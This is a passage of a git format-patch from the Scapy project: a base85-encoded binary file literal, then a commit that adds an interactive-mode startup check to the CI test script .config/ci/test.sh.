zP)6TWQr}wfO=h`pph^d8Hew>3rVcsjNav_MYM0_g(mdHc0!J4pqg^Vg-3D58|9x*X z;(J@@nnu2e!!Ls;?ICls3y)0A2_2AZZ|gfK&NeAI+Q&c4!N$8VBhMviP;mdSF#D(k zn^13u{`S$?KH>f2qpZ>ck_LJfrP_A$igGBV#S64;1~rYD#)!YT5sP!GpW$z(IhB3v z?q}E5O-U;+4LtRA;p|3NNV)~X#iGagA`Q8BIOc&)l#~cpx_*NyA}#+Q*}a`IaHf)Q zcG1FlafKyto=(>^b!6*SzYU={qInc0@NopQT$wHaNcMvafAEK`j3@&3$aF;JU6G)T@ zAHpk%Dk5H|Y0bAQW#C06;k8iz**5R!AGGPK*RGiUYa0W_@M=#WGO7)YB9^fRsbPx@BfTe^mi{t61Q#WJH6}ZDa z<#SSuDG4OcC}s%?48GWJldLc^YK&5HFH{bFPIkIBjO5NwdshTbjzEPGO{Q+7Q*;m@ z;fd3VXjU!m`z{lg9#O^^QAuN@)Ec8poBCS1us^u`NoRUb4)=N^ycrkBVqrY$msr@iT!h>0gT>I#&F1^41A0j^EJ;r&HuT9|3k;*Zspm<#*pA&u-b$3hdsRvi;Bp|BK*U=t|>ZuPONRZ(Vg}Kpdlr- z#?wsv5==XJjgN^T*>O`T112g7reEH3oxK$Hdk$UW-O&LVwjGvb>mQLXA2f5pnjZP1 zYqZqgHy|%;Wpv#YR!?=dn7-OSf5h1NH#AnFE*U?o24&TAazn%7Xbq6|5N zl3*?=uTDpyUhD&vF$^kA!gxUHtZ$4NmN0tMS2pQdYXPXy{Dqf0;Su_gWiK@o_?3ouI8I-o#cPz)+`D>^Yz5j5i5qf ztX1^fmCz};Pn|Drk1gMK=oj{J^7iw6Uz!fzvtwOtR$FOX);K+U+F9m#%i`qJgWZkm zKN+-Wb>Y0c(IW36~o>C87wwKl=o;yMrd_X1f!7uN1?pp+Vav5FI zq#_ASwM4;M0>C3n-Y>^5KF>DWGc++f)4Mo1wR>cYovm}CgO^Q2q_=ZyOo(syLXz zaHtb%8-2+0s3Ov`bpYyNlzn(fv>ZIYI)BPLuY9GlliToT@B^?JV$Ge1M>ET$JvP-A zNtx5IHkJPIh!xBjY~sAFYf!#@p^EH4Jg4RX2<0j$$M!I{m}aXT?Us>0`MOAadjOt~ zR^+}RyaV7BgDq-Wdy(3(ojX3%9@)_4RP>KF*89{K-cgKCVlC&!u zKJ4i`Wc|CcgRR$GYcc6?gYo~=jmv71-0ipD+jc9oUK(uk&tFjkN7}EPTH^S0_2M(j zi|nk7lYWnz(=_{EgW|5E!+R`nI6v>7-$vZHerC_CZe5Hc_s;qjJmB7seV6Bl8tgwB z|El8({e655(0ReP_HEaX^J!Vq*y!V-u7Tk(13H{M(kEs0Z_^`t^~yex`8~=fz0)zZ$=2=`^GJ%UvBRQtFkBcDrd4qph+mK5fo=IB({M#kYFA?bWZ`=z!jtrlmt$jDOnJOeZhT*JD=UhfzV@r`_Gr z=pXA4^D^CogTCv147nTfPnhG~-VT;o-76Yf*N?nx;GXMoqDSoh3r1Zp`rK%>5{@^QG^fP!dT6uoJP8;Q}kxbXs`{eJFo4rR&yQ$n1s~N5~ z2y8nzBCPFVU&GGD)!r4~L~+4+Cr5k4C@Ar{hB+sQ^M~sMn`G3n)F>E0C!nM`S8}iV zoMRsw%u@;CdlwuRx(V;-Cx$NXTlK}MG`TG%`baIkb@UB%ecs)!|X@}F#I@?o~oIm4?X9&Gl?%Ub;?r1e$n^K<`G1ys%5 z`nH>q(};U*bq}{JO;{7X{&%B!?b5zJ`Ealx5Co}Z2!b>o{zr|KOrGvPmC46+IZWXk zMg}FtoUp$3b3=$8hQ@+SacLJ(4ioxSkISmZNl7Rn$!MHz4;CvDoqmynb|-MvjWXmt zl_c+f`Oezpvnmq=agq4olZ+yDR4Rtwn?{w-IO^D&E>n`^pwOJx_?UDd-{l8o^g$(! z$&29t2w98`{_CuVKJL&p&6p^FEniWVmUclDN?ZiT;2p67z{`z!Sf)zoY#r=*w%EUh zFHa};JaVA#MX&Hr*qYIy zD-NC68|+*|-s1TXv(IyvWq$4Ba-{O&q~TxR%?(-I+wc0ZrulUS^fU{7xusdVMf2u$ z>FDBqqIlfV;$?qF&*?h2!F#>l*{5so3GTSRo<)#xTFDN}wr8F!J>dO&?wEDGZOvO6 zuH4)7Wr@qei;i=PN@o;&+CA!V?McnQ|JZAOu=U=lZFVUt9~eaU3Ay}Xk8ke8A?xzS z&sApHCA@f%q)3|9+V|w;#Dqo7?)L4PT0d*B!?*WA%~zaqNoW~e|7(x5_q#rphGhJA z!}zFOtGc~k=QKEeAl_-fpU#_Z-YIFfaMYj^1s{g=xwJ=i%DnMI-Kur3Blk9$wx`@q zcZP5Fn<%!sl3+f z$HjA-yES}v$=7#(%^p`Q6U3dt>i7kHOKL}x$@iiyrbjfMoznF0MsxgmFx**oY;GGn zlM|CJcb^{~?Hj4t@6?6W1}hlcD5+fG*W;fRbGkD{CyVbMnz%m}c0|Ufp;O0DAQ^7f z6vvYD0?E;pyw2xr#B0<`DT60a@;RHX#S@vWhN?^;fW#!m&8E^E!rmXzpy2)(y-*1G z52?YoJoC-sQp6wf4N@Fpuo?7%{*HC+m({mkdeDpMr~fwFe9gRyt=*U+<%{l8CSRLr z$wXt6-8qR-;%p4g)*wOZ|M8{UmL&xuNWY=Ew;In~5@oADXvzf;B-p`{4NxC>uyXCR)rhkWiH?H~m(6YYKdMP6v(q_2@B&R1hI9YkwBu1pf#Dql+ z9yBl`C^02B&wEgR--zJu8R1FYqKf?s0)qSJc6Uwk9_-p9Dk-@zIVHos*gH8HJ2jQ^ zp!*{?z+K%h#w9T@0(X^`p7}j1x5MY?_j`{{7`n@-<5$I|xSl^Ad~n?RZeP#{SNk*n zMO_R#KcKFUh0Hc{{l?7KJ@Y4a`K^)HYrmQc5{$Z@et7l8+P+WMy}q(+%B7*37TnJ< z@~ts?^u+a#+QQRl(l|0Lpr~L#SYq+OgiMFQu|49$d{YNl+1exzD00lCb!5DT>k&gs z$?8~9OIj?^Ns+C;+2Os!3lt=i{b`D=0ZLjptipOwBXN}xVN5lDi7_m`k&<)3Z@LV6 zLR>$aTQGNy|AT$@g$rlREx+_6*!ZKxK5Ryc&`3$*eLk-IN6k-&VF{uf;75qFR8de$ zm%zzW(rU0K_(ac9(&#gBa3$WLDN)4F@OhkFf#XQZ&?{7uUisylhfklVbj5ET(sgQ? zCWCq!(f6vTQE+-g!%|V_TbGqzK57|3w^O42=$2Tjh`gDXh9d{c=$A_B_m{Z)ltRQ* zMLk4f05K|Y)iy=L;fU3<)Wnud;XD3TT_zbjOC$Q0b}+jT@8(v$1}Q#3k;*iXF-Sio0sa6+93W`cbyKf&oZfyQbgWx!4) z!QM{`_JTQgRSw*X{7J{rm=7ZNE2+C5qCeS-8DUpnpT8^p?suPgvWysJl!ZiGxn@}n z4Aha)L=g=t>XVjA@vDxf@Kg99IB{OWfWteJ{BU{==oaARuLA+z8d~rkKQLcq51}I^ z&d0+M)!`Zk!9&w31P^r~1ucbTe;}Zsr(pHMyXS#D`bqkNPqY;Bdv#z9nD=io|$IRzDq3$pXz_$kB6dO-oP7$Ni zJbVKJ&;Lqctz~5F2|5XLA zR8DLjJ)+@zbv%aCfW8PQU8xEj_G&|LO29Mu^7zbm=})`B`mJGFcR{Aks!Ol^oh@SO z)(!kf%8ptCt+1^LN%^AV!upLimR|}9UHK*9z=proicd6q-Oc<)>)TJVf=gJ7l)daH zqvGLe{CE#l8eftT5`LTDKnPxxq03M*@MFoE>i7xP`|7C#p&4D%;77a6p;EaUpx(U(O^(}fY?g3|DmI2(I9>blla#J zTPDq96-mB=`@N<1gNyfCT`fNy1$|yenh1i{{skF=wxy!pqv)XjnTLs`rq<8LnV#R3 za{qdd{Kb1r&P3kWR}s+D>h!ATpN#{O20d)pzu>p$19h(Sx!88@k)xBZ-?7LLT(;LLpS$XHcoB6NEZK@~E z35xJ#Muz)^4|MJkSnQk8KgOddz`;M)F~!cyW`L7-LUvYYm|e0>a8W^Gf@4&-nD9c^ z&`8_h%+T04|Fps+C#xcIrF6t~XnWXB=2TM;r8qI=;_5w@9HRLouI!ZZ;KZ+Ap3#wn zN)~BU8K!&!hDv{ymrDNNTa#yp4T4QRH0o2QBr4S&S^;dJ?o0jYD}0R@yE7XMOEgNa zxI)0`)2c^faZwz>5s{CpZK379y0YIrtX2LmN?JV@YW?viKfz@hg;?2U$~d5sWN_!| zW5MQ|d{rsHPMQRE1<&hRKN5LN{Y?syj}2%(;#NISrrL``>gl4M`_lS`yUcr7k8yfPuTRQEVMl=#LP7k&dN!{>1g?O{7r#BjdOBO5qnL|;Z?iA`2E&h|M0UMmpi3h@zXL01b4Uo9tkPF z1O3x&9UTK)qLK%O4)%5p3QTqy+&v>c*|E^mIVZ}`r+fc=KQEtxf<|45AH|pZS1mj@1Oqb%NF+fV}C2Z%;|Nu zJu2#(W>agV<=iE97Q?PM-_M=fN_M=$)1~e9Z$I1(E!G>O~H~!xB z(m!FBGu}B&TJ$nBu;t65NRv&S7q>VNA3ae&@6>=1lg0}kaTZHPxtz1_ZTQu8`|d$oJmZk*7u@300= zBUbtU=G(j8Z(|25T?R&fKc3}kGEQFG*WbBb>7bG3f85+M*6Y!#t8<)M$t_|-_SM>Z zvi1INbNcL`)4RvYPxrL+IxT~F8BWoE<{G^GfUz^1)V^OrYJ+BzADwyCHRLaY)wR9` zugKeEZP(YY{P6AksU~@K=k8I=9h>RXOi!_I-jd$E%?&d?jNdn3;~B#W=+@tTwHN^q$DQ*G&5d5X&Uxo?I*utu?1VYYW5t-mJFD{!YZ{)T z(gPbviFzWfR*SaVTS_OzHmU8y{0wjVl{t^#~DA!!kq(Bq-IA+zBU^oLyIh9+N*=Ra6!;;rzlY6x4(DWI$94XV^>GJJQZxRD?9 zv)XL9U1Q;I)4N|t&M&@C*DLy{dp?WF!o8~J=P#XYl0F@fuR5M2 zTXWRuMPIjWt{HI12+wc4#_{|<0>@V=15YXmPjjttI`Z3C zl>ysD*F+?7AX>b%TTWm+V!*n&&<*q=DV18u0A?fnIQ2ehGbt1$kZKl)NXAt^XA1A4 z+P?SUL|0L5n@M{wer|N~{JF!RA^(Ye=DCtmdb0z<#_S3)PXPwtb z4Ni012o9jcX!KsfZ zBrjoD2oMv99q1m-sXu+iO8SCO21ut^x5UI$+NN*Bd5zzXUIo#()u?f+Mu+ObHfd~v z5JcIB*_B)CSMEOa0bly4%?yTq{CD?+q<@QTUr``LjX8xp5Cq~>6GwK4P1oWbJ;opF zHG}Yy@TS|LtC2YVjmb|vPZ{`AN%%Lc&Uo|AosOMHI+#GEL9 z|3F9kw0LigU#FH$;#SpW$6h~Du{Bs@#Gemwa&&cdb#}yBqmu(R6+7FxIO7c(dngie zrH*fTF=W1Tdq!g+LMi?DcLpPQ;p)!;0L3` z5dHC>@jh@9LPWof>-4tG^d|q?N1P0>UvQgxhhZ{}zuHehyx=JRv?U*Ed%=V+clSOr zyZM3U*PC41#9CfGkQUYYWu5(N<_;}96dHSL;Le=#ixY0P8|&B)u&u zU0qgH7~$ObXxsHkZS!kP+jiB_Soi6r`A552Hu$okCY!Q-Yk>Q_mr1^R-Bo9O7BtLv zGwWw@!Kv!v@4H`|Y}@wW0k@?GcgG5IzROD6PYxe@`CC`#f$5La-+uPE(QtU+k**Od zw%95>*Bor4K=6=2TcGIoDEF7kozG}9lta9R6D`oqI@qOAC zyy(3B?;*R&w|fz!V`j+*On?rm-PQVuv8C?0!9v6RmrHA2zu7KBNR@_wj~{3( zqxmZFt^;^i_(&P!h?2&!_`TLR-ha0h>tNUDnkLa_H~0uaz~Q70BH#KvY{nHn?QV4y zQilD=@8hPdT&(=8`??~}&Z$wzZY{3pF9bxOY&P95`~ z&ZFAyQMcQ?-RdwRr0Hj)`8B5X_bfN8=m>0_x{DLFUg)Be=c_p6rLYEaZPu_ zqBfD|-JVR}5cb3MMaOe<`*oon1OG~c&w(D4h|?z^uIy1q7WR*FGL!?&B7 zZ@YN$-LZyu_iT~Xts5TT`g-A}y`9P(IyQVZqm_SyUgz@7>~u;7-#ixecIer5@n5$; z+82XOKW4(}t>+!wl*{5ao?z1}w|y)jSKO5Bvn7%=ZWwYdz5S9&;#+Vo&i1y>c(2*n z+1An4!Nrjj)6a>^A60K`C>8%+il`3$H>JvXg66n5#C(o-ZiLGJN3NgP2Y>5;#24rs z&+~Oz?i_Yu3YyZ;KOR^kk;~Rx5f@?jMQuk6R^bD_p%hAizqD;@>+0lU@8am{ zWaof)OM)pxKZh{`e|MBO#_=X# zNAoJj->p85$*}ALxy}tt$n~=7bAts0HG*H?l|O?YF5|F|^}+4bYnMB0S}ZQM=a82K zom`j9Vd)!814+Dzkqh<1V&60d4*V2{A+P}T8k8|VQF1wZOACf?L;eH|Z|E8)1svAu z5p*3))e%IwP}n2xZV^5aexc#EPSJ%S*%>~;8F7X78L7cG-tqB8S+@OS>@o*N7iNSG zE(*>|$O^QNip=sUNbn7@wGZ`+a2^!jpW^lCsQPPs)F~wb07=RHm$A`@rw#R7d*t~P z`wOo>onIzx*^rC!DijQ1!4&_VjkO~``*R1BdrhtB8j=qGg}o~tpvDm*oJ7gW zci3Nt9U&&_i^i!lukvx~_Y8F?b-^6tgp!Zb)#`l;!gELT`GG$}AMv9!8g_F5BAPv! zEbzN#Hxaje)Mktg0h?HZ#5}s#pR3+sHbCm=hMN2zll!+U^E#4KfR*Z zncp`Rsa{}nhAY6V0XqQ`T39A6UMTt646sly=phcIkH?IXkGf8=RUBiAUQezsA~nTv zs+pX`pbZANgBg~FV_Rh`s-smSC{OA6{;g= z@_5VBlDkgtMdQON{Z!`7H_7X~M99p6Cb|wyG7c8?FDY>Y)BRjU z8-3^<)Xv=LQmkD;rn*`rRO7oOV(z-le%s=>vEH)F-g_R&-XAW?X*IU*)JSm$FoDnM zNw}m@O|(l(DskjN8S{Wjng_qc59gf3I;e`SA%VVVLcK7L$);I45wFuPwNK+$%@&+k zjQUE-7(bMJ{ItGlB1~;kUu7zcrfZxSbb#1;MZ1LA(XA0_pCp=qlZi&K13`#t@6Z|f zt_xWT;pOS(;gRH%n9@J1TdI$hSNCFH{{X!G7BM&|$icH)fMZ&C-k_K)`=SD0+bpM` z{?Q?RcJ@Iw8EIjzR$eL2`QC9te==HV|2ckOQw9sA+WLZ|lTwT_+r$5*cOU_%+9jd) z!FzOEKbe@X-Z%QqIHks>sw&p2o?>GN&hpnZhOd%^2@5n{4a7aYYk|+=eORGVinI1` z>)R$1g`zO-;1fZR=;Nb+tuE6yqAGuRg}y-o?@cKg__T8SKi*E092eS4K@d@*=XuhO zwkpJvYFm(%@;aAcle2M5zG+YJ3zft#Q-)(;k;Of0eg`&#Upmn>O1v9vM&bR5`$w2& zrvX@)&Wj`lQasg`O5QK=Q8in1Za-Z7Od0)CiT+F8YW4rn;h?3!Zt#9-C7Fkx;V290 zcNru*sovGK{U4k@h}Hja3Q}gl`~U>p?oflNu|Lp{lJ>wUY;K-^WZj%5Imd^lrzBsi zYIIp(UE>A$-pRJ2#xjCHkv8cOq(~%ZZ`3+&AK|cJ_qy&u?I)KmDi_y^t7}W~Ud^w* z=%=fvJ3r59LW~#2t9)!0!7f6i6&bXllE&tU7H!P^S6kZCw`Fzd4OMK0(EmjoBbK-P&CQ+C8+JFr@uaeKerxY^(9E(Bolb zqD?Ha1plra9NAI^{8SR1fB8;l@&MQcW^|479fSaBVS73uCTfq`CD|*ryZ0X)c~M5Y zR8qTIYsbvm^E+a)&FGpYNxOicz_8zAg=xkQlbR{~Pag9-sD1P!yyrDe|6{dKzd#wX z9VPWs(x5v1h2NcSsuaQ&{*3ykR0ttIe^?B6?Y22|X&YDhARxm2Qsn&)^Scb)`L6jz zw|f8V4-9gAzQFT);N_QgS7lSqe7rDuX3h7GMz8;VQ(&cgEN@x2RdK>uuWaX8l@YNe zHQ%RyEL(bTy!ki7(4uGgeP3_3KGv+xDtouDyPOZaw3+#&Vb9y07iKh*ADhy8^0qg- zM^5q@)Y7c=oXV)Y+3iQ3uQXYpS}|qH#16e@-Ee8-VB#3L$jZCjms207w^8Ii=rRC%bE_HynySpFjS1Ma#D<7bTmoo_fo>$CJ?U zH98euk6gU0`>{SIro)^oF8!Vss%ICf@0xsgT)5GJD?9$USaW>gp!O4wi3?8&m=FfR z?+xp@t~~mwZgW1yBgn2ZW#SZ(K18oxZWSfj;acT?&F}vyK~fop?LNM)%o+yk(UsV` zjz%|O)1J=t%tbE^-WoXjerfrVgp~Tb0(!KLt1RW8C-c}i5ra=(9TXEEYvQdTyw1n` zWIT?eD1*1CB;J};eaxB11g5eFmx@XJR&x||7hpOf#paYW<*GCxoK%8GRPEAJVxQFa zOn!#GLdnZZWN;4moi|Yl3<#o1yf-8I;C6^Z$N`pYbzcGKFy`5hYfJN};H4e*vm}Pd=ek}l;|C0r%a8YHHs@$^pOD`gSv{X14A`rfCu{e3jE>v*Zf7DLO}&p+w8<+= z8`rGg6Qg5@jE5S}eGt6r;YPRP2UdOY)wwo%EW4Y&;moW3ZSG``v>NC))NIqL7FRnQ zQ^su{_2&Gi^q!rPa?g~EuXFrRJJr4^F{`@Y%^$vK*}TgILrhXe86Uk2s}x_x3!{KQ zypv|}M9uFoo;XkINP??&d}#xhv9CqM@ylsPG_>HSI1N8hjPXCp7*8sRhF_}Fko_Gv zTjeNz=Np%eI3Hn?Dy=-hKvu_&VHGmc_0$BwG!v$;>^*l_*QeIC>+Fd>(!cdMXj}e` z^V^p+5qMf&F!(p*#H9BN4}D+xN^UUi28m4pF$ax_qnV(5MMdqPvvcig6>H=i-!_0{ zLf$vUD~RtXLG0pH>!Ha9D@Um&ooFDd9?al3^B+zRqRUTtJW^*X>d}_EPEkEZWU5)HQu{iRX)BJ7xbI4Ar-A6t z(2XJIMf!6xFbKWiJ$N9PV5OOd5R2b6 z`>}Q)XHnBE|r-7w!FOlpYF(KLU&<6t?baK z)UX(Tzy9I*IsR$I#bFVHl+G@h#o0Q^IfL>7^MwI!i35BJd{QG5{j#$If}=cx)4YSM zybJsjy>gvAJbXj@2gXDV3W)dV9-ie|nCKIgn;9RJ6cXWQ<>?p`)gw=IXC(T9&f?!L zGD*uwg1N`_laI354vPp9$V zQ#G!7fd>g!5qXkxBOCWey$xmHN+sd?i!WC{+|q>UqaE(qkD{BzMD0*}dwG?&*Ss~3 zXHZ6aR8o5}TC^Kpa|iVAAi9P`f4PRyv@L<7q_okAHYvqqQcP#(Ci8{a@$OP^%@FH4 ztw=%PevtBz7;BqM^BFQ$hQOsbf%rB>#5ni|HGjT@!%vG{a(D^ue!R}%Zn+u96ies? zxOq$gaBtCqyOknVg?)Ye8JhHz#6LQDyx!1z!{^1R?O5I}wV%fC;qABnh+{9xXrD@= zi`Lv_*5`VvoFE~Q#4(fo`uZnbs-CEQ>gO;&$@{UT=gBwyKYY|J&A_|dN7e9#4)hCj zms}%zX^RZMs@5zf;lXMDX;do@7iKX1i%X0L4<60rFU5EU7_m}{u2VFT|IyQVl9L_= zGZ3?WryB>B{~X3I!T-~?9O*I#^#aPE6O}}#Jgsp^I2@y*Z*o*miQoYq@$622VD;3N ze&Okh&y=MtblTf++Nn`tqsTG<-+2BnJ47WHME&}d=xthW9!(mNIM0+caY z8;dx_E2$9^iMMr^PqD9?>-bSpGxRqTd?csQ2CBq_-Ah^293v@wwQiq48(dZ~g^GOMw$YTLyY z8Doq4RLSqB6#@!E9^?(s;ajBITtRYfRLKA zTuaTD1IXoqJrqzTK|q-V91%qjX9fW?aLV*KV40Sc`qa$Ishnq0OSD(|a?CNyF}07- ztjy&7|9hWvx!3o;_xA61?mp+9bM{_)?X}lhd#$zi`Ph>y4H}WN6jn&Pq$rs`Hq#gG z5{G)VByh$4yeR$<^qBY=&bRYGe==u(n(g{?m3cMhZ%cU3nw&9rfEaaf;`XiepGDpO z$p;r!`dm*9Hy)k0<#Kw?)uab=tPujjQ!$eK;8_to>GaFm1t*7|hF!=eZU?SE^^jTX z2xsY>Fo00GGQn~E;g#DJ&9Krb?Y-;A%Ec%VP_a#H+XQhX+LlUE?#lyhW6ric_1)w_ zm9SBE;yon3FMN{aWLYZ3CC3=jqY8>k>CX}miF)w7D&H0L4gLz(z=-Mu`H!6SO}S== z%i5V&Oh&n{Iq#!n65DH_h3CA|m$yt;luu68)xA6&d*a_8)1~7rKEy;AJ`RP54-3st zo*ZtTn3Nn96q`R_czm~n-udJ6lB2r$PmG$JQ#4_CKz>YVP(W5zUdp7t3ElgTiA+oF zUzAXkX6cpHFS96CQ@*@FCRSZl)fs36*plzFaF=2`6x25unvYJ9r}tzGyT z5bR}MzARm8tHa^kM~$h})IoAAze8)D~anfxcnRzIo~!Ya5cl2M6&U zn=h6?LGnc2bPI);27EKoaR?CFOHD46;lg+lU3B+bt4agA{X9oHDOiZG=WEo{}9sz?VzgAZ?9>fR8!hE4J&)VTYDtT%_=x6+V*h-`8-4;RMLx7<1h{ z@125W`$jxjY8?kKAG>_9uJ3{;zfu9_>+pKj$sY-7BmRj*cnFuMUlDMPV||qC*fT@w z34qIP&kQAGwj1L1{P2u`OQ4Q1W$BNs;=u>3iCbPYeX&9W)$v&^v9723s(>~Pjk2r#(lij~4?4(pcb zKgTkz#7#V7SS%hAIGMK$*W-9Ziky8_X18CEA@ifXCMQFJELh-${>WVr%ie&9orZ7w7fP^if8G@cB7a%g*qamo40zSly>SON+LMET`U3@<6o3K&tEnH3cn z5STrwEH*MXs4&-mY~k2wb8cR7YI<;DN?>+M(1e(g<6;vhlw|vlEe=T5E%mAth=M-|0)jD@FC*}K0EuUioI7OA9E4pfaa6juGX}7r+x^ zG)(F^>mZ}^(H*XeJ`I8x)%)Enxkgo+hkviko8CzS-l+GUpheQH;A4uQ$v3D!QwPF4 zTNpo=p zAIn3zs(eP2yN2h~*?vNMgzg5p`q-{L=RbP@-T!MAA=`r!p>lCeAOA)2UaCG9(S2?E zKiYlxoTW?4{R=daL0??lo=wR!|B*PW9o7+jB99S)*1+eda4@%^jwp7VPpyWFW#9MvOKC4()9XY(H^A z0+sg6=^H7ZF7p6Rm{UGAu*1nQ?{N5Z_Vb=K6)P1omM&cB*s|A(**Pbw3kSxg|NPrq zCtFpHxJM~V4Dv7@l4swJf%4^{81AokdAV`eck!O5+-aq8P^8JEAt!dCdv>y%qcm^Cz^c+wla$RU^uZy-52P?%Nf-b6( zaSi%cp+hhy4yM@Y5NhtH1tw>(CM1@M1V_B$vg&f+*@x4AY)`$btFh_Mt-NzjeeY6T zUACs^cEaS1|1#Mc3mu`;`_d>@L?I^bYK}4m2pH%g?E(@fAPeO?uvIWHKlKFTr=~!d&-y&aeu~SwC(bKyT4X;deHM^lhK<`bWxjCKQnPbcje*z zy$zSRWj@g6R$!OWn6MDn`r4$Xid)+CL2vtZC@reo0#4Z2Va@N?GGbVH8Q=hqO>AE(M;>a}53u zz4g*dz8=(DF?Eu0n+EVgAXT_0ffN=g6M9F#&~w(s^J?*gsPk$u&e!k&{V^wxw2L)T zDo>ex9q2;?I~5oe^HU4lZ{o@te9D&v6_M+SL9eR`u$B(T#0THL*y}}kAfANoV72X4 zh;=`|hBj&IWXl&XvJ@uqLj4cnXFJ{%e~EV7U@RMT@X2TgbGDfXH4DfXf;5};s zUq$J*p)1d0{EJ|{;U5O9ZvV#PUew#>@Tbno#pQfYQDD3jMsE}c)kG%3MA$0DrGV`& zPxE*HHs*wFnjLJZ&mD!H(}(wDYAB*>XvXU#1>YbMG#9_{id>Wdf1)a;Llr`4RF4b2jF2&c)Hoavu0=&ZjlPjVGkR)y4R7GF1F=&&p#tNR2fN$hEm0 z(Z~O0;;s)d)4iv{TkH;7gNA2UWf(-{bFd>>H8o|`_xq0I>I?K}ICYY321;o}57x`qZE^I@`6HCC%AN!EH-EUNoaqDm9xg8I3 z6_wZxXR>g4VN`-^aL=Q1w7k0@hCj4O2;sd#5l&L+`faO==YbExw#Vk3l!fTZ7KUf7 z0-Z_Jr#r6%qtt8)!bbtQp@)gOOZ-&%&vdH}9J-LE-mq5ut+mQG)fc64Jc)6ma6HZM zj>GjL9>5QCj;9Pe{7milo5=~#$%OF)wO-gfD=^^#WxGp_vy$W@Tw8#>CnkQO@+l4l zZ$)25r04v6On+(qlfqH{4ihbQkOEPwQNjzj2|AL1yDefH)bl(rR*;K+wc8Ix{i3`K zai+U@PbSD6e7mzK`8WYnl?qTDJ5C}ltl>AQTg%&SA!BSpyoHaj$_VZ~{3hnb<*z(6 z`PF_BKeg=74p(Q*_-EARBQN_bnqU5)wqlmiVa%q-yZJv;bquaIFQZ%-|oHreg@sS}qTcK={e zWp}SLul9Mh>#=ps_D}a;x7a-=FY~}|$KRXn^f+5=^=86NnoK|yMdz7_%$V$gz=!=D zc0^QTtnp&A7j8Lh*)e5$?I_RJj%DY;NE?6J<`<#a%W1hq!>YsF~& zjy8$7X08AIj^f&%2l^km=zqIdIFk3X;33>vlSm-1!wd+d!`KyS6VTJ-~XsvAUsl=t&($S6LatOZ#%yeQ)sns z!e{Mt|HOTSj=`oZ9dXd)oH;Ks^YhV?SqPq>kp*Ce9k=YGlEv?Lte|RXr;rGI60h|( z?inFha1H0V>I}Rh7kK@_jvw3~xyWQuZt|YBIA=6n*PP@S7Q2EtPI#ihW#n{S)tI2G z46C-&gBgbo^9ZMLoM{1CzVK;Mt86SqT z_;>5>A7ts)4eA?qfP9yOdR7_6h};?&lcPU34Bhd^W7DPqg`|b)RuK>EiI$;Hbz;_S z-0FI^Tk@d(2Z5*8cmP+(1+IqM;z}*-vKVU>a(Ry>A_?AUkXk*NU?Q0yb)|BOUIQHy zMvb(Ze4(BxY*P(2JFUa6&3m`(d#7ut<%3%RhHV*MhT8J0VWB}0aglkw(i779clOIK zju{tJ8dw@RIxWUhmLHXqk`P@uqJKtG_NbC%OI$xoW>QRkWW<=r%-qC`jI^Xo{|Ovz zs9Q_A#+wE!DA2J>>Odn2oroil{px8u)b&?gq2o+}q^tK7gKDw#ieLU$~CSHLxmBqwGYTM0JA!m&zaxNt7leBZRh!F^T2lC){)2NNgzw zdQ~%@718fqu?SBYs}~6>5n9YWoI(_LgX^Sz8R zkLrsb;%69gjULAR6W85&VC*7C)4ivBVv8TO-Q;YOQEkS1T2BjuJ-5_&js~I^xtc%` z7W=H_lB4M?5Xz|+V#tPy*mF78ZKP?B2CMT*=aV1`5$427o@xayxsQ=ny)`39A|+rV z!o|}+KWw|-RM_G$-DRJnyTG;vDO?w}$E|TNG|dKzYuEGpF5YaA_{Dtg@%xOY*Q58o z>S-MR#?|)ss#hPmaV|T6{2PTf0DZ{?C#(SgVE=2K3F>&L!?H}ktS5n2VtbJIN6_EI zD4bh(fc}_sylu6`uhO<-7s!z&yk|{<(LgC`)T!}igzI*xH|L(hOhfKlseJ6^@ z29p9u?+LEKnCF?Wa!||&qr8_sKh{R1M{w5esI!%vWq4|+G|d?@TgLd!B24>Q+T7G!#*dgp$>CPQIO7pLA)9H zXtvm=d{udNxSZM1n%OjuGGzLNy1L5VJ9;f?S64T^aqHW})#8o3bE~(a4`MF(MG}7P z>F1b4N5lpF| z3Xn$JUV41A@X8Wz=XY?v z$qW2WCP7FX&uu_sUieC2Z?}m25teZQS($~p51!?-9`I@;QO`cg*-v?(9_Fm)sqd%t zItQKPb>3qVJsSbzt-f~wXAur;IX)T)L29FgmGfDlN^67;wK=v&&3kLA*Qo_+Vd$jb z$&-d>2S!+uN)nPY$}%%7-Mg1!y3pNRT$(m|QlEmLKEumKrsVo(7nk(zGa|wqKRP#R zROkHoprqua96~M=+rxHMi%Ze2!$CM-#RKhP&UVGv;cvmN7tpThyk|`SRxJAm;B^@8 zBO%G1JGcEyO^YvXNq-XNp+*RAS14h}RxOXYdWvd!OX(fgc+7=jj~k07{wT>?pWpSe zG1IYd+hnbs@UtD{Lt6iQ9gVa9!8;umnLMn#6OUtg!%JX33&`6rIwLeIr*7t=PT=gI zI3|Cp9-=eO>(qe6R1Vkbd#v^VhW*aZr`P>;Qy1|KOI5eJNx2}F8TcRm7RZI*2?96_gfxwPa2P3ZvE1V)5F@d{~_lYxC$NA$lz0wpP3k+pFFxSx_?1zNk&{y z89AH-IGi4(p&KN~rwOcWf({15M6cDknXj)nSwFSHBi#vrS1 zI^gydkS!GktUw?tDulLLZ<5w)6zVv`5Vb#0ER(=H|C=B#1^#cW!+BpGk^gT@VaQUG zCuT!P693{2$rCXSRLz_uEx8UHn&=~uSP$z<7gwUbyZn##tN*elbm2skS+h%{vqhH+ zhk_`DKP->sj^KqN%B|&C=)nW+U`~47U`s~`5NHQo0t48l9rPI%4E*M1C$DX<+;{3<|xp z9(lInO$GyS)lYLn({%q)1w|Q?`{u^<>s2_e_jq%_aQ}#eSTogPl{QQ#dOAgi>I5i> z^v0mCnlCJ$XH`4w0~Z87i2He>eZ)Qh`xip{Juv_P literal 0 HcmV?d00001 From fe715ab700383b292b7b25890035ea33a54b99f6 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Tue, 31 Mar 2020 10:55:38 +0200 Subject: [PATCH 0075/1632] Fix ./run_scapy instability --- .config/ci/test.sh | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/.config/ci/test.sh b/.config/ci/test.sh index 01f06ddd0f6..206b093799d 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -69,3 +69,12 @@ echo TOXENV=$TOXENV # Launch Scapy unit tests tox -- ${UT_FLAGS} || exit 1 + +# Start Scapy in interactive mode +TEMPFILE=$(mktemp) +cat < "${TEMPFILE}" +print("Scapy on %s" % sys.version) +sys.exit() +EOF +echo "DEBUG: TEMPFILE=${TEMPFILE}" +./run_scapy -H -c "${TEMPFILE}" || exit 1 From 